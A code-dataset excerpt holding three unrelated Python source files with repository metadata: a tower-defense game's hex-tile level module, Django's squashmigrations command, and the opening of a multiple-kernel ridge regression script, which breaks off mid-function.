26431c64510748aee61329bbbd39815af5d0ec6e | 21,960 | py | Python | typingdefense/level.py | Juzley/typingdefense | 8adbd0d4e02bcd8ac1a1c827efb0e7c740bded82 | [
"MIT"
] | null | null | null | typingdefense/level.py | Juzley/typingdefense | 8adbd0d4e02bcd8ac1a1c827efb0e7c740bded82 | [
"MIT"
] | null | null | null | typingdefense/level.py | Juzley/typingdefense | 8adbd0d4e02bcd8ac1a1c827efb0e7c740bded82 | [
"MIT"
] | null | null | null | """Module containing all classes required to represent and handle a level."""
import math
import numpy
import weakref
import json
import copy
import ctypes
from collections import deque
from enum import Enum, unique
from OpenGL import GL
import typingdefense.glutils as glutils
import typingdefense.camera as camera
import typingdefense.vector as vector
import typingdefense.enemy as enemy
import typingdefense.util as util
import typingdefense.hud as hud
import typingdefense.phrasebook as phrasebook
def _cube_round(fc):
    """Round fractional cube-format hex coordinates.

    Rounds each component independently, then rewrites the component with
    the largest rounding error so the cube invariant x + y + z == 0 holds.
    """
    rounded_x = round(fc.x)
    rounded_y = round(fc.y)
    rounded_z = round(fc.z)
    err_x = abs(rounded_x - fc.x)
    err_y = abs(rounded_y - fc.y)
    err_z = abs(rounded_z - fc.z)
    if err_x > err_y and err_x > err_z:
        rounded_x = -rounded_y - rounded_z
    elif err_y > err_z:
        rounded_y = -rounded_x - rounded_z
    else:
        rounded_z = -rounded_x - rounded_y
    return vector.Vector(rounded_x, rounded_y, rounded_z)
def _hex_round(fh):
    """Round fractional axial-format hex coordinates."""
    # Convert to cube space, round there, then convert back to axial.
    cube = _hex_to_cube(fh)
    rounded = _cube_round(cube)
    return _cube_to_hex(rounded)
def _hex_to_cube(h):
    """Convert axial-format hex coordinates to cube-format."""
    q, r = h.q, h.r
    # The implicit cube y component is chosen so q + y + r == 0.
    return vector.Vector(q, -q - r, r)
def _cube_to_hex(c):
    """Convert cube-format hex coordinates to axial format."""
    # Axial keeps only the x and z cube components (y is redundant).
    axial_q, axial_r = c.x, c.z
    return vector.Vector(axial_q, axial_r)
class Tile(object):
    """Class representing a single tile in a level."""
    # Pointy-top hexagon geometry constants, all derived from SIZE.
    SIZE = 1
    DEPTH = 2
    HEIGHT = SIZE * 2
    WIDTH = SIZE * (math.sqrt(3)/2) * HEIGHT
    VERT_SPACING = HEIGHT * 0.75
    HORIZ_SPACING = WIDTH
    def __init__(self, app, cam, coords, height, colour):
        """Construct a (hexagonal) tile.
        coords is a vector containing the horizontal coordinates of the tile,
        using axial coordinates.
        height is the number of stacks in the tile.
        """
        self.coords = coords
        self.height = height
        self.colour = colour
        # Next tile on the route to the base (filled in by Level._build_paths).
        self.path_next = None
        self.tower = None
        self._shader = glutils.ShaderInstance(
            app, 'level.vs', 'level.fs',
            [('transMatrix', GL.GL_FLOAT_MAT4, cam.trans_matrix_as_array()),
             ('colourIn', GL.GL_FLOAT_VEC4, None)])
        self._hex = glutils.Hex(vector.Vector(self.x, self.y, 0),
                                Tile.SIZE, Tile.DEPTH, height)
        self.outline_colour = colour
        # Faces use a washed-out copy of the outline colour (assumes
        # util.Colour exposes an HSV-style ``s`` channel — confirm).
        self.face_colour = copy.copy(self.outline_colour)
        self.face_colour.s = self.face_colour.s / 2
        # Dictionary of waves, keyed by the level phase in which they appear.
        self.waves = {}
        # Whether the tile is a 'slow movement' tile.
        self.slow = False
    @property
    def q(self):
        """The axial q coord of the tile."""
        return self.coords.q
    @property
    def r(self):
        """The axial r coord of the tile."""
        return self.coords.r
    @property
    def x(self):
        """Calculate the x value of the world location of the tile center."""
        return Tile.SIZE * math.sqrt(3) * (self.q + self.r / 2)
    @property
    def y(self):
        """Calculate the y value of the world location of the tile center."""
        return Tile.SIZE * (3 / 2) * self.r
    @property
    def top(self):
        """Calculate the world Z coord of the top of the tile."""
        return self.height * Tile.HEIGHT
    @staticmethod
    def world_to_tile_coords(world_coords):
        """Convert world (x, y) coordinates to tile (q, r) coordinates.
        Note that this is a 2D conversion only."""
        q = (world_coords.x * math.sqrt(3) / 3 - world_coords.y / 3) / Tile.SIZE
        r = (world_coords.y * 2 / 3) / Tile.SIZE
        return _hex_round(vector.Vector(q, r))
    @property
    def empty(self):
        """Indicate whether the tile has a tower on it."""
        return self.tower is None
    def draw(self, outline=True, faces=True,
             outline_colour=None, face_colour=None):
        """Draw the tile, optionally overriding the face/outline colours."""
        with self._shader.use(download_uniforms=False):
            self._shader.set_uniform('transMatrix')
            if faces:
                if face_colour is None:
                    self._shader.set_uniform('colourIn', self.face_colour)
                else:
                    self._shader.set_uniform('colourIn', face_colour)
                self._hex.draw_faces()
            if outline:
                if outline_colour is None:
                    self._shader.set_uniform('colourIn', self.outline_colour)
                else:
                    # BUG FIX: the original passed the boolean ``outline``
                    # flag here instead of the ``outline_colour`` override.
                    self._shader.set_uniform('colourIn', outline_colour)
                with glutils.linewidth(2):
                    self._hex.draw_outline()
    def picking_draw(self, picking_shader):
        """Draw to the picking framebuffer.
        This allows us to determine which tile was hit by mouse events.
        """
        # Encode the axial (q, r) coords into the red/green colour channels;
        # Level.screen_coords_to_tile decodes them on mouse clicks.
        picking_shader.set_uniform('colourIn',
                                   [self.coords.q, self.coords.r, 0, 0])
        self._hex.draw_faces()
class Base(object):
    """Class representing the player's base."""
    START_HEALTH = 100
    def __init__(self, app, cam, tile, origin, z):
        # NOTE(review): ``origin`` and ``z`` are unused here — confirm
        # whether they can be dropped from the signature.
        self.health = Base.START_HEALTH
        self.tile = tile
        self._shader = glutils.ShaderInstance(
            app, 'level.vs', 'level.fs',
            [('transMatrix', GL.GL_FLOAT_MAT4, cam.trans_matrix_as_array())])
        # Slightly smaller hex than a tile (0.8x), two stacks tall.
        self._hex = glutils.Hex(vector.Vector(tile.x, tile.y, 0),
                                Tile.SIZE * 0.8, Tile.DEPTH, 2)
    def draw(self):
        """Draw the base."""
        with self._shader.use():
            self._hex.draw()
    def damage(self, dmg):
        # Reduce health by ``dmg``; death handling is still a TODO.
        self.health -= dmg
        # TODO: Death
class Level(object):
"""Class representing a game level."""
@unique
class State(Enum):
"""Enumeration of different level states."""
defend = 1
build = 2
    def __init__(self, app, game):
        """Set up the camera, load the map and build the GPU resources."""
        # NOTE(review): ``game`` is not stored or used here — confirm whether
        # the parameter is still needed.
        self._app = app
        self.cam = camera.Camera(
            origin=[0, -30, 60], target=[0, 0, 0], up=[0, 1, 0], fov=50,
            screen_width=app.window_width, screen_height=app.window_height,
            near=0.1, far=1000)
        self.phrases = phrasebook.PhraseBook('resources/phrases/all.phr')
        # Level state
        self.timer = util.Timer()
        self.money = 0
        self.state = Level.State.build
        self._target = None
        self._phase = 0
        self._towers = []
        self.enemies = []
        self.waves = []
        self.tower_creator = None
        # Map/graphics etc.
        self._min_coords = None
        self._max_coords = None
        self.tiles = None
        self.base = None
        self.load()
        self._vao = None
        self._vbo = None
        self._shader = glutils.ShaderInstance(
            self._app, 'level2.vs', 'level2.fs',
            [('transMatrix', GL.GL_FLOAT_MAT4,
              self.cam.trans_matrix_as_array()),
             ('colourIn', GL.GL_FLOAT_VEC4, [1, 1, 1, 1])])
        self._build_vertex_arrays()
        # Off-screen buffer used to map mouse clicks back to tiles.
        self._picking_texture = glutils.PickingTexture(app.window_width,
                                                       app.window_height)
        self._picking_shader = glutils.ShaderInstance(
            app, 'level.vs', 'picking.fs',
            [['transMatrix', GL.GL_FLOAT_MAT4,
              self.cam.trans_matrix_as_array()],
             ['colourIn', GL.GL_FLOAT_VEC4, [0, 0, 0, 0]]])
        self.picking_draw()
        self._hud = hud.Hud(app, self)
    def load(self):
        """Load the level.

        Reads tiles and (optionally) per-phase enemy waves from the JSON
        file written by save().  A missing file yields an empty map.
        """
        # Fixed world bounds; the tile array covers the whole range even
        # when only a few tiles exist.
        self._min_coords = vector.Vector(-100, -100)
        self._max_coords = vector.Vector(100, 100)
        width = self._max_coords.x - self._min_coords.x + 1
        height = self._max_coords.y - self._min_coords.y + 1
        self.tiles = numpy.empty([height, width], dtype=object)
        try:
            with open('resources/levels/test_level.tdl', 'r') as f:
                lvl_info = json.load(f)
                # Load tiles
                for tile_info in lvl_info['tiles']:
                    coords = vector.Vector(tile_info['q'], tile_info['r'])
                    colour = util.Colour(tile_info['colour']['r'],
                                         tile_info['colour']['g'],
                                         tile_info['colour']['b'],
                                         tile_info['colour']['a'])
                    idx = self.tile_coords_to_array_index(coords)
                    self.tiles[idx.y, idx.x] = Tile(self._app,
                                                    self.cam,
                                                    coords,
                                                    tile_info['height'],
                                                    colour)
                # Load Waves
                phase_idx = 0
                if 'waves' in lvl_info:
                    for phase_info in lvl_info['waves']:
                        waves = []
                        for wave_info in phase_info:
                            coords = vector.Vector(wave_info['q'],
                                                   wave_info['r'])
                            tile = self.lookup_tile(coords)
                            wave = enemy.Wave(
                                self._app, self, tile,
                                enemy_count=wave_info['enemy_count'],
                                start_time=wave_info['start_time'],
                                spawn_gap=wave_info['spawn_gap'],
                                enemy_type=wave_info['enemy_type'])
                            # Waves are registered both on their spawn tile
                            # and in the per-phase list.
                            tile.waves[phase_idx] = wave
                            waves.append(wave)
                        self.waves.append(waves)
                        phase_idx += 1
        except FileNotFoundError:
            pass
        # The player's base always sits on the origin tile.
        tile = self.lookup_tile(vector.Vector(0, 0))
        self.base = Base(self._app, self.cam, tile, vector.Vector(0, 0),
                         Tile.HEIGHT)
        self.money = 500
    def save(self):
        """Save the edited level to file.

        Serializes tiles and per-phase waves as JSON in the schema that
        load() reads back.  NOTE(review): waves are written with
        ``enemy_type.__name__`` while load() passes the raw string through
        to enemy.Wave — confirm Wave resolves the class name.
        """
        level = {}
        level['name'] = 'Test Level'
        tiles = []
        for _, tile in numpy.ndenumerate(self.tiles):
            if tile:
                colour = {'r': tile.colour.r,
                          'g': tile.colour.g,
                          'b': tile.colour.b,
                          'a': tile.colour.a}
                tiles.append({'q': tile.q, 'r': tile.r, 'height': tile.height,
                              'colour': colour})
        level['tiles'] = tiles
        phases = []
        for phase in self.waves:
            waves = []
            for wave in phase:
                waves.append({'q': wave.tile.q, 'r': wave.tile.r,
                              'enemy_type': wave.enemy_type.__name__,
                              'enemy_count': wave.enemy_count,
                              'start_time': wave.start_time,
                              'spawn_gap': wave.spawn_gap})
            phases.append(waves)
        level['waves'] = phases
        with open('resources/levels/test_level.tdl', 'w') as f:
            json.dump(level, f)
    def picking_draw(self):
        """Draw the tiles to the picking buffer.

        Each tile renders its (q, r) coordinates into the colour channels
        (see Tile.picking_draw) so mouse clicks can be decoded later.
        """
        with self._picking_texture.enable():
            with self._picking_shader.use(download_uniforms=False):
                GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
                self._picking_shader.set_uniform('transMatrix')
                for tile_list in self.tiles:
                    for tile in tile_list:
                        if tile:
                            tile.picking_draw(self._picking_shader)
    def draw(self):
        """Draw the level: map geometry, base, towers, enemies, then HUD."""
        self._draw_vertex_arrays()
        self.base.draw()
        for tower in self._towers:
            tower.draw()
        for e in self.enemies:
            e.draw()
        # HUD last so it overlays the world.
        self._hud.draw()
    def play(self):
        """Move from build into play state."""
        if self.state == Level.State.build:
            # Recompute enemy routes: tower placement during the build phase
            # may have changed the walkable map.
            self._build_paths()
            self._hud.animate_defend_phase_start()
            self.state = Level.State.defend
            self._phase += 1
    def update(self):
        """Advance the game state."""
        self.timer.update()
        if self.state == Level.State.defend:
            # Update enemies
            for e in self.enemies:
                e.update(self.timer)
            # Remove enemies flagged for unlinking; iterate over a copy so
            # removal is safe while scanning.
            for e in [e for e in self.enemies if e.unlink]:
                self.enemies.remove(e)
            # Update towers
            for tower in self._towers:
                tower.update()
            # Spawn new enemies (waves for the current phase only; _phase is
            # 1-based after play() increments it).
            active_waves = False
            for wave in self.waves[self._phase - 1]:
                wave.update(self.timer)
                if not wave.finished:
                    active_waves = True
            # Check if the current phase is finished.
            if not active_waves and len(self.enemies) == 0:
                self._hud.animate_defend_phase_end()
                self.state = Level.State.build
                # TODO: Check if we've finished the last phase.
    def on_click(self, x, y, button):
        """Handle a mouse click.

        During the build phase, clicks that miss the HUD place the currently
        selected tower type on an empty tile, if the player can afford it.
        NOTE(review): ``button`` is currently unused.
        """
        if self.state == Level.State.build:
            hit_hud = self._hud.on_click(x, y)
            if not hit_hud:
                tile = self.screen_coords_to_tile(vector.Vector(x, y))
                if tile and tile.empty:
                    # TODO: Check if the tower ends up leaving no route to the
                    # base
                    if (self.tower_creator is not None and
                            self.money >= self.tower_creator.COST):
                        tower = self.tower_creator(self._app, self, tile)
                        self._towers.append(tower)
                        tile.tower = tower
                        self.money -= tower.COST
    def on_keydown(self, key):
        """Handle keydown events."""
        # No key handling yet; typed characters are handled via on_text.
        pass
    def on_text(self, c):
        """Handle text input."""
        # NOTE(review): _update_target is not defined in this part of the
        # file — presumably it re-targets self._target based on the typed
        # character; confirm elsewhere in the class.
        self._update_target(c)
        # _target is dereferenced by calling it (weak-reference style), so
        # check both the reference and the referent before forwarding.
        if self._target and self._target():
            target = self._target()
            target.on_text(c)
    def add_enemy(self, e):
        """Add an enemy to the level (called by waves when spawning)."""
        self.enemies.append(e)
def tile_coords_to_array_index(self, coords):
"""Work out the array slot for a given set of axial tile coords."""
return vector.Vector(coords.q - self._min_coords.q,
coords.r - self._min_coords.r)
def iter_tiles(self):
"""Generator function for the level's tiles."""
for tile_list in self.tiles:
for tile in tile_list:
if tile is not None:
yield tile
def lookup_tile(self, coords):
"""Look up a tile from its (q, r) coordinates."""
if not self.tile_coords_valid:
return None
index = self.tile_coords_to_array_index(coords)
return self.tiles[index.y, index.x]
    def screen_coords_to_tile(self, coords):
        """Work out which tile a given point in screen coordinates is in.

        Reads back the picking framebuffer at the clicked pixel; returns
        None when no tile was rendered there.
        """
        pixel_info = self._picking_texture.read(coords.x, coords.y)
        # The blue value will be 0 if no tile was hit
        if pixel_info[2] == 0:
            return None
        # The q and r coordinates are stored in the r and g values, respectively
        return self.lookup_tile(vector.Vector(pixel_info[0], pixel_info[1]))
    def screen_coords_to_tile_coords(self, coords):
        """Convert screen coordinates to tile coordinates.
        Returns a vector containing the coordinates on the q and r axes.
        This will return a value even if there is no tile currently at the
        coordinates (in contrast to screen_coords_to_tile). This does not
        take into account the height of tiles - it unprojects the click to
        world-space with a Z-value of 0."""
        # Unproject to the Z=0 plane, then snap to the nearest hex.
        world_coords = self.cam.unproject(coords, 0)
        return Tile.world_to_tile_coords(world_coords)
def tile_coords_valid(self, tc):
"""Determine whether a given set of tile coordinates is within range."""
return (tc.q >= self._min_coords.q and tc.q <= self._max_coords.q and
tc.r >= self._min_coords.r and tc.r <= self._max_coords.r)
def tile_neighbours(self, tile):
"""Find the neighbouring tiles for a given tile.
Takes a Tile and returns a list of Tiles.
Does not consider whether a given tile is empty or not.
"""
dirs = [(+1, 0), (+1, -1), (0, -1), (-1, 0), (-1, 1), (0, 1)]
neighbours = []
for d in dirs:
neighbour_coords = vector.Vector(tile.q + d[0], tile.r + d[1])
neighbour = self.lookup_tile(neighbour_coords)
if neighbour:
neighbours.append(neighbour)
return neighbours
    def _build_paths(self):
        """Calculate paths from each tile to the base.

        Breadth-first search outward from the base tile: each reachable
        empty tile's ``path_next`` ends up pointing one step closer to the
        base, so enemies can follow the chain home.
        """
        # Clear any previous path info
        for _, tile in numpy.ndenumerate(self.tiles):
            if tile:
                tile.path_next = None
        # TODO: Start a 0,0 for now, but eventually will have to work out where
        # the base is and start there.
        start = self.lookup_tile(vector.Vector(0, 0))
        if not start:
            return
        # TODO: consider height
        frontier = deque([start])
        visited = set([start])
        while len(frontier) > 0:
            tile = frontier.popleft()
            # Only tiles without towers are walkable.
            for nxt in [t for t in self.tile_neighbours(tile)
                        if t.empty and t not in visited]:
                frontier.append(nxt)
                visited.add(nxt)
                nxt.path_next = tile
    def _build_vertex_arrays(self):
        """Build the interleaved (x, y, z, r, g, b, a) vertex data for all
        tiles and upload it to a GPU vertex buffer.

        For every vertical segment of every tile, four vertex runs are
        appended in a fixed order: 6 top-face verts, 12 side verts, 6
        top-outline verts, 12 side-outline verts (36 per segment).
        _draw_vertex_arrays relies on this layout and on the 7-float
        (position + RGBA) stride set up below.
        """
        # TODO: Could make data smaller with indirect buffers
        all_verts = []
        for tile in self.iter_tiles():
            for s in range(tile.height):
                face_top_verts, face_vert_verts = ([], [])
                line_top_verts, line_vert_verts = ([], [])
                for i in range(6):
                    # 60 degrees between consecutive hexagon corners.
                    angle = 2 * math.pi / 6
                    # Base height of this vertical segment.
                    z = 0 + Tile.DEPTH * s
                    # Corner (5 - i): winds the top face opposite to the
                    # side vertices computed below.
                    px = tile.x + Tile.SIZE * math.sin(angle * (5 - i))
                    py = tile.y + Tile.SIZE * math.cos(angle * (5 - i))
                    face_top_verts.extend([px, py, z + Tile.DEPTH,
                                           tile.face_colour.r,
                                           tile.face_colour.g,
                                           tile.face_colour.b,
                                           tile.face_colour.a])
                    line_top_verts.extend([px, py, z + Tile.DEPTH,
                                           tile.outline_colour.r,
                                           tile.outline_colour.g,
                                           tile.outline_colour.b,
                                           tile.outline_colour.a])
                    px = tile.x + Tile.SIZE * math.sin(angle * i)
                    py = tile.y + Tile.SIZE * math.cos(angle * i)
                    # Side quads: one bottom and one top vertex per corner.
                    face_vert_verts.extend([px, py, z,
                                            tile.face_colour.r,
                                            tile.face_colour.g,
                                            tile.face_colour.b,
                                            tile.face_colour.a,
                                            px, py, z + Tile.DEPTH,
                                            tile.face_colour.r,
                                            tile.face_colour.g,
                                            tile.face_colour.b,
                                            tile.face_colour.a])
                    # NOTE(review): these outline ("line") side vertices use
                    # face_colour rather than outline_colour, unlike
                    # line_top_verts above -- confirm this is intentional.
                    line_vert_verts.extend([px, py, z,
                                            tile.face_colour.r,
                                            tile.face_colour.g,
                                            tile.face_colour.b,
                                            tile.face_colour.a,
                                            px, py, z + Tile.DEPTH,
                                            tile.face_colour.r,
                                            tile.face_colour.g,
                                            tile.face_colour.b,
                                            tile.face_colour.a])
                all_verts.extend(face_top_verts + face_vert_verts +
                                 line_top_verts + line_vert_verts)
        verts = numpy.array(all_verts, numpy.float32)
        self._vao = glutils.VertexArray()
        self._vbo = glutils.VertexBuffer()
        with self._vao.bind():
            self._vbo.bind()
            GL.glBufferData(GL.GL_ARRAY_BUFFER, verts.nbytes, verts,
                            GL.GL_STATIC_DRAW)
            # Attribute 0: position (3 floats at offset 0); attribute 1:
            # RGBA colour (4 floats at byte offset 12); stride 7 * 4 bytes.
            GL.glEnableVertexAttribArray(0)
            GL.glVertexAttribPointer(0, 3, GL.GL_FLOAT, GL.GL_FALSE, 7 * 4,
                                     None)
            GL.glEnableVertexAttribArray(1)
            GL.glVertexAttribPointer(1, 4, GL.GL_FLOAT, GL.GL_FALSE, 7 * 4,
                                     ctypes.c_void_p(12))
def _draw_vertex_arrays(self):
with self._vao.bind(), self._shader.use():
tile_count = len([t for t in self.iter_tiles()])
for i in range(tile_count):
GL.glDrawArrays(GL.GL_TRIANGLE_FAN, i * 36, 6)
GL.glDrawArrays(GL.GL_TRIANGLE_STRIP, 6 + i * 36, 12)
with glutils.linewidth(2):
GL.glDrawArrays(GL.GL_LINE_LOOP, 18 + i * 36, 6)
GL.glDrawArrays(GL.GL_LINES, 24 + i * 36, 12)
def _update_target(self, c):
"""Check whether we have a target, and find a new one if not."""
if not self._target or not self._target():
targets = [enemy for enemy in self.enemies
if enemy.phrase.start == c]
if targets:
self._target = weakref.ref(targets[0])
| 37.346939 | 80 | 0.514754 |
48c876e724d77ac50edfd30e7c7037d74c99f265 | 8,767 | py | Python | python3.4Smartforest/lib/python3.4/site-packages/django/core/management/commands/squashmigrations.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/core/management/commands/squashmigrations.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/core/management/commands/squashmigrations.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.db import DEFAULT_DB_ALIAS, connections, migrations
from django.db.migrations.loader import AmbiguityError, MigrationLoader
from django.db.migrations.migration import SwappableTuple
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.writer import MigrationWriter
from django.utils import six
from django.utils.version import get_docs_version
class Command(BaseCommand):
    # Django management command: `manage.py squashmigrations <app> [start] <end>`.
    help = "Squashes an existing set of migrations (from first until specified) into a single new one."
    def add_arguments(self, parser):
        """Register the command-line arguments for squashmigrations."""
        parser.add_argument('app_label',
                            help='App label of the application to squash migrations for.')
        parser.add_argument('start_migration_name', default=None, nargs='?',
                            help='Migrations will be squashed starting from and including this migration.')
        parser.add_argument('migration_name',
                            help='Migrations will be squashed until and including this migration.')
        parser.add_argument('--no-optimize', action='store_true', dest='no_optimize', default=False,
                            help='Do not try to optimize the squashed operations.')
        parser.add_argument('--noinput', '--no-input',
            action='store_false', dest='interactive', default=True,
            help='Tells Django to NOT prompt the user for input of any kind.')
    def handle(self, **options):
        """Collect the targeted migrations, optionally optimize their
        operations, and write out a single replacement migration file."""
        self.verbosity = options.get('verbosity')
        self.interactive = options.get('interactive')
        app_label = options['app_label']
        start_migration_name = options['start_migration_name']
        migration_name = options['migration_name']
        no_optimize = options['no_optimize']
        # Load the current graph state, check the app and migration they asked for exists
        loader = MigrationLoader(connections[DEFAULT_DB_ALIAS])
        if app_label not in loader.migrated_apps:
            raise CommandError(
                "App '%s' does not have migrations (so squashmigrations on "
                "it makes no sense)" % app_label
            )
        migration = self.find_migration(loader, app_label, migration_name)
        # Work out the list of predecessor migrations
        migrations_to_squash = [
            loader.get_migration(al, mn)
            for al, mn in loader.graph.forwards_plan((migration.app_label, migration.name))
            if al == migration.app_label
        ]
        if start_migration_name:
            # Trim everything before the requested starting migration.
            start_migration = self.find_migration(loader, app_label, start_migration_name)
            start = loader.get_migration(start_migration.app_label, start_migration.name)
            try:
                start_index = migrations_to_squash.index(start)
                migrations_to_squash = migrations_to_squash[start_index:]
            except ValueError:
                raise CommandError(
                    "The migration '%s' cannot be found. Maybe it comes after "
                    "the migration '%s'?\n"
                    "Have a look at:\n"
                    "  python manage.py showmigrations %s\n"
                    "to debug this issue." % (start_migration, migration, app_label)
                )
        # Tell them what we're doing and optionally ask if we should proceed
        if self.verbosity > 0 or self.interactive:
            self.stdout.write(self.style.MIGRATE_HEADING("Will squash the following migrations:"))
            for migration in migrations_to_squash:
                self.stdout.write(" - %s" % migration.name)
            if self.interactive:
                answer = None
                # Keep prompting until a y/n answer (or empty == "n").
                while not answer or answer not in "yn":
                    answer = six.moves.input("Do you wish to proceed? [yN] ")
                    if not answer:
                        answer = "n"
                        break
                    else:
                        # Only the first character matters, case-insensitively.
                        answer = answer[0].lower()
                if answer != "y":
                    return
        # Load the operations from all those migrations and concat together,
        # along with collecting external dependencies and detecting
        # double-squashing
        operations = []
        dependencies = set()
        # We need to take all dependencies from the first migration in the list
        # as it may be 0002 depending on 0001
        first_migration = True
        for smigration in migrations_to_squash:
            if smigration.replaces:
                raise CommandError(
                    "You cannot squash squashed migrations! Please transition "
                    "it to a normal migration first: "
                    "https://docs.djangoproject.com/en/%s/topics/migrations/#squashing-migrations" % get_docs_version()
                )
            operations.extend(smigration.operations)
            for dependency in smigration.dependencies:
                if isinstance(dependency, SwappableTuple):
                    # Swappable-model deps are re-expressed via the setting
                    # so the squashed migration stays swappable.
                    if settings.AUTH_USER_MODEL == dependency.setting:
                        dependencies.add(("__setting__", "AUTH_USER_MODEL"))
                    else:
                        dependencies.add(dependency)
                elif dependency[0] != smigration.app_label or first_migration:
                    dependencies.add(dependency)
            first_migration = False
        if no_optimize:
            if self.verbosity > 0:
                self.stdout.write(self.style.MIGRATE_HEADING("(Skipping optimization.)"))
            new_operations = operations
        else:
            if self.verbosity > 0:
                self.stdout.write(self.style.MIGRATE_HEADING("Optimizing..."))
            optimizer = MigrationOptimizer()
            new_operations = optimizer.optimize(operations, migration.app_label)
            if self.verbosity > 0:
                if len(new_operations) == len(operations):
                    self.stdout.write("  No optimizations possible.")
                else:
                    self.stdout.write(
                        "  Optimized from %s operations to %s operations." %
                        (len(operations), len(new_operations))
                    )
        # Work out the value of replaces (any squashed ones we're re-squashing)
        # need to feed their replaces into ours
        replaces = []
        for migration in migrations_to_squash:
            if migration.replaces:
                replaces.extend(migration.replaces)
            else:
                replaces.append((migration.app_label, migration.name))
        # Make a new migration with those operations
        subclass = type("Migration", (migrations.Migration, ), {
            "dependencies": dependencies,
            "operations": new_operations,
            "replaces": replaces,
        })
        if start_migration_name:
            new_migration = subclass("%s_squashed_%s" % (start_migration.name, migration.name), app_label)
        else:
            new_migration = subclass("0001_squashed_%s" % migration.name, app_label)
        new_migration.initial = True
        # Write out the new migration file
        writer = MigrationWriter(new_migration)
        with open(writer.path, "wb") as fh:
            fh.write(writer.as_string())
        if self.verbosity > 0:
            self.stdout.write(self.style.MIGRATE_HEADING("Created new squashed migration %s" % writer.path))
            self.stdout.write("  You should commit this migration but leave the old ones in place;")
            self.stdout.write("  the new migration will be used for new installs. Once you are sure")
            self.stdout.write("  all instances of the codebase have applied the migrations you squashed,")
            self.stdout.write("  you can delete them.")
            if writer.needs_manual_porting:
                self.stdout.write(self.style.MIGRATE_HEADING("Manual porting required"))
                self.stdout.write("  Your migrations contained functions that must be manually copied over,")
                self.stdout.write("  as we could not safely copy their implementation.")
                self.stdout.write("  See the comment at the top of the squashed migration for details.")
    def find_migration(self, loader, app_label, name):
        """Resolve *name* (a migration-name prefix) to exactly one
        migration, raising CommandError on ambiguity or no match."""
        try:
            return loader.get_migration_by_prefix(app_label, name)
        except AmbiguityError:
            raise CommandError(
                "More than one migration matches '%s' in app '%s'. Please be "
                "more specific." % (name, app_label)
            )
        except KeyError:
            raise CommandError(
                "Cannot find a migration matching '%s' from app '%s'." %
                (name, app_label)
            )
| 8,767 | 8,767 | 0.610243 |
8faad1c0f417eab3396b362bcc477d27aecd7393 | 13,717 | py | Python | tools/krr-Cortes.py | cosmo-epfl/glosim | 930998b7249adc0ac3e48308314233341de6e73f | [
"MIT"
] | 24 | 2017-04-19T14:23:53.000Z | 2021-12-23T13:37:23.000Z | tools/krr-Cortes.py | lab-cosmo/glosim | 930998b7249adc0ac3e48308314233341de6e73f | [
"MIT"
] | 9 | 2017-05-23T10:30:08.000Z | 2019-02-05T06:43:04.000Z | tools/krr-Cortes.py | lab-cosmo/glosim | 930998b7249adc0ac3e48308314233341de6e73f | [
"MIT"
] | 11 | 2017-05-01T14:37:40.000Z | 2021-12-23T14:00:12.000Z | #!/usr/bin/env python
# compute kernel ridge regression for a data set given a kernel matrix
# and a vector of the observed properties. syntax:
# $ krr.py <kernel.dat> <properties.dat> [ options ]
import argparse
import numpy as np
import sys
import MultipleKernelLearning as mkl
import costs as cst
from select_landmarks import farthestPointSampling,randomsubset,cur,segfind
def main(kernelFilenames, propFilename, mode, trainfrac, csi, ntests, ttest, savevector="", refindex="",**KRRCortesParam):
    """Run Cortes multiple-kernel-learning KRR over one or more kernels.

    kernelFilenames -- list of kernel/similarity matrix file names.
    propFilename    -- file with the target property, one value per row.
    mode            -- train-set selection: "random", "fps", "sequential",
                       "manual" (reads train.idx) or "all" (not implemented).
    trainfrac       -- fraction of points used for training.
    csi             -- per-kernel exponent applied before learning.
    ntests          -- number of train/test repetitions.
    ttest           -- fraction of points held out of selection entirely.
    savevector      -- basename for saving the best run's weights
                       (<name>.alpha and <name>.mu).
    refindex        -- optional file mapping kernel rows to structure indices.
    KRRCortesParam  -- forwarded to mkl.TrainKRRCortes (sigma, mu0, ...).

    NOTE: this module is Python 2 code (print statements, xrange).
    """
    trainfrac=float(trainfrac)
    #csi = float(csi)
    ntests = int(ntests)
    ttest=float(ttest)
    if (mode == "sequential" or mode == "all") and ntests>1:
        raise ValueError("No point in having multiple tests when using determininstic train set selection")
    # Reads kernels
    nbOfKernels = len(kernelFilenames)
    kernels = []
    for it,kernelFilename in enumerate(kernelFilenames):
        kernels.append(np.loadtxt(kernelFilename, dtype=np.float64, comments='#', delimiter=None, converters=None, skiprows=0, usecols=None, unpack=False, ndmin=0))
        # heuristics to see if this is a kernel or a similarity matrix!!
        if kernels[it][0,0]<1e-8:
            kernels[it] = (1-0.5*kernels[it]*kernels[it])
        # first hyperparameter - we raise the kernel to a positive exponent to make it sharper or smoother
        kernels[it] = kernels[it]**csi[it]
    # reads properties
    prop = np.loadtxt(propFilename, dtype=np.float64, comments='#', delimiter=None, converters=None, skiprows=0, usecols=None, unpack=False, ndmin=0)
    # check if size of input of the kernels and property is consistant
    for it,kernel in enumerate(kernels):
        if len(prop) != len(kernel):
            raise ValueError("Dimention mismatch between kernel {} and prop".format(kernelFilenames[it]))
    for it,kernel1 in enumerate(kernels):
        for jt,kernel2 in enumerate(kernels):
            if kernel1.shape != kernel2.shape:
                raise ValueError("Dimention mismatch between kernel {} and kernel {}".format(kernelFilenames[it]),kernelFilenames[jt])
    # Kernel matrices should be square and of the same size
    nel = len(kernels[0])
    # reads index, if available
    if refindex == "":
        rlabs = np.asarray(range(nel), int)
    else:
        rlabs = np.loadtxt(refindex,dtype=int)
        if len(rlabs) != nel:
            raise ValueError("Reference index size mismatch")
    # chooses test
    # Accumulators for train/test/true-test error statistics over all runs.
    testmae=0
    trainmae=0
    truemae=0
    testrms=0
    trainrms=0
    truerms=0
    testsup=0
    trainsup=0
    truesup=0
    ctrain=0
    ctest=0
    ctrue=0
    if mode=="manual":
        mtrain = np.loadtxt("train.idx")
    if mode == "all" :
